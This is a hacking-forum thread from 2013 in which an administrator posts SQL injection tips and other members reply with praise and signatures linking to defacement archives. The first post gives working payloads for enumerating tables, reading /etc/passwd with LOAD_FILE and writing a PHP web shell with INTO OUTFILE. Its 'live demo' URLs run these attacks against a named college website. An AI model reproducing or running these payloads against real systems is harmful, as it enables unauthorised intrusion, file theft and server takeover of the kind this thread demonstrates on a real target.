Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


SQL INJECTION TIPS

  • 1 Vote(s) - 5 Average


10-14-2013, 03:19 AM #1
madcodE Offline Administrator **********
Junior Administrator
Posts:501 Threads:99 Joined:Oct 2012 Reputation: 8
Mood: Devilish
Assalamualaikum.. madcodE haxor here

in this article I will give you some SQL injection tips

Tip 1: avoid use of qoutes '' ""

okay when we are injecting a website and we reached a point where we need to use where clause and give input data
for example we are tyring to find column names of table admin
we mostly use
Code:
select column_name from information_schema.tables where table_name='admin'
but it dont work all the time.. what to do next?

we can avoid use of qoutes .. we can use hex values instead.. or convert the string in mysql char
we use hackbar > SQL > MySQL char for it
or we can use encode options in hackbar Encoding>Hex Encoding>string to 00ff00ff
when you input string it will like
61646d696e we have to add 0x before it and make it like 0x61646d696e
and then add it in our query that will look like
Code:
select column_name from information_schema.tables where table_name=0x61646d696e
Tip 2 SERACH TABLE NAMES FOR SPECIFIC COLUMN:
You inject a website with a big and awkward database , You get lots of table names and you
dont know which table might contain login details
so what you gonna do with it Biggrinsmiley
usually you retrieve table name and then move to columns to find login records
but in this case Biggrinsmiley we are will scan all table name for some specific column in all databases
lets say our specific column is "user"
so to find out what table name contain this column
we will use query like
Code:
UNION SELECT table_name From Information_Schema.columns where column_name="user"
or
if it dont work we can hex column name (in our case, hex of passwrd is 0x75736572)
Code:
SELECT table_name From Information_Schema.columns where column_name=0x75736572
LIVE DEMO
Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,group_concat(table_name))+from+information_schema.columns where column_name=0x75736572

[Image: x9g0.png]

this query will look in all databases but if you want to search in current database
you can add AND condition in query and make it look like

Code:
UNION SELECT table_name From Information_Schema.columns where column_name=hex_of_column_name and table_schema=database()




Testing if your current db user can write/read permissions?

first you need to check the database user
you can find it using user()
and query will return data like [email protected], [email protected] or just user / anything



so you got username whats next?
how to check if user have read write permissions?
easy
use this query
Code:
select file_priv from mysql.user where user='username'
sometimes you need to avoid qoutes and use hex instead

live demo

Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365

LIVE DEMO OF READING /etc/passwd



Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))--


what next if you got write permssions ???
if you got write permssions we can write our shell in any writeable directories of website
but how ??
using out file function
but how to use it?




Code:
SELECT '' INTO OUTFILE '/var/www/dir/mad.php'

NOTE: /var/www/dir/mad.php is just an imaginary directory for this article .. you have to find root path yourself

how to access the shell?

just go to dir you provided like this

Code:
yourwebsite.com/dir/mad.php?mad=whoami




SHOUTS TO MADLEETS TEAM
1337 HAX0RLIFE MAKMAN DrZombie Haxor Hussy and the rest of team

10-14-2013, 03:24 AM #2
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,128 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
You are awesome bro wink
Thanks for writing this awesome stuff.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


10-14-2013, 03:29 AM #3
Sizziling Leet Offline Any problem of iphone ipad ipod ask me ! *****
Respected
Posts:469 Threads:53 Joined:Aug 2013 Reputation: 1
Mood: None
AwesoMe Bro Biggrinsmiley

[Image: FcZ0mAj9G.gif]


[Image: xlu6ncekv.gif]





Code name : Sizziling Leet Haxor

Contact : [email protected]


Facebook
https://www.facebook.com/david.daniel.90857901 i chnaged my accout so please bros add me there


ReGarD's Worriedsmileyhy:





10-14-2013, 03:31 AM #4
Diizzy Offline cat /etc/passwd ***
TeaM MaDLeeTs
Posts:146 Threads:5 Joined:Jul 2013 Reputation: 1
Mood: Say What
The tips are very helpful ..
Thanks for sharing with us wink

 
--------------------------------------
Facebook | Twitter

--------------------------------------

10-14-2013, 03:36 AM #5
Dr41DeY Offline Madleets 2017 :) ***
TeaM MaDLeeTs
Posts:285 Threads:12 Joined:Sep 2013 Reputation: 0
Mood: None
Thanks, for these tips! Biggrinsmiley

Welcome back, Madleets 2017!


10-14-2013, 11:05 AM #6
Cr4t3r Offline Junior Member **
Registered
Posts:24 Threads:6 Joined:Oct 2013 Reputation: 0
Mood: None
Amazing ! Biggrinsmiley

If you give a hacker a new toy, the first thing he'll do is take it apart to figure out how it works.
Jamie Zawinski

10-14-2013, 05:14 PM #7
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
AwesoMe Bro Smiley1

jabber : [email protected]

10-14-2013, 11:32 PM #8
Sn!p3r_GS Offline Super Moderator ******
Super Moderators
Posts:354 Threads:19 Joined:May 2013 Reputation: 1
Mood: Relaxed
Good tut bro thx

Islam Forever

Love & Respect to : Zombie_Ksa-H4x0rL1f3-Shadow008-b0x-1337-Invectus-??dcodE-DeXter -MakMan-MindCracker-Sniffer

http://th3mirror.com/archive/notifier=1/page=Sn!p3r_GS

11-17-2013, 12:10 PM #9
_-_ L.a.F.a.n.G.a _-_ Offline -_- ComPleX StRuCtuRe -_- ******
V.I.P
Posts:238 Threads:46 Joined:Mar 2013 Reputation: 3
Mood: None
alaaaa maddy janu :-* <3 Lub u AIna sara >Biggrinsmiley< :v

Hackers Make TooLs Not The ToolS Make HAckers (:| :-<


Add Reputation If You Like My Work.

11-17-2013, 01:26 PM #10
Ninja-Inj3ct0r Offline Junior Member **
Registered
Posts:10 Threads:3 Joined:Nov 2013 Reputation: 0
Mood: None
Gr3 post and well explained ~! . Also It was a load_file Injecting Biggrinsmiley :lol:






Forum Jump:


Users browsing this thread:1 Guest(s)